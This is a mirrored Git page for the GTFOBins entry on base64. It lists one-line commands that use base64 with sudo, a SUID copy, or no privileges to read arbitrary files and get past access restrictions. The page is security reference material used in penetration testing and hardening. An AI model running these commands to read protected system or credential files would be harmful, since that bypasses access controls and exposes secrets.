This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-08 08:31:32 +01:00
Code
Issues
2da69686ac
GTFOBins.github.io
/
_gtfobins
/
base64.md
Andrea Cardaci
323553f4b0
Make base64 portable
2018-06-04 14:59:57 +02:00
320 B
Raw
Blame
History
functions
sudo-enabled
suid-enabled
file-read
code
LFILE=file_to_read sudo base64 "$LFILE" | base64 --decode
code
LFILE=file_to_read ./base64 "$LFILE" | base64 --decode
code
LFILE=file_to_read base64 "$LFILE" | base64 --decode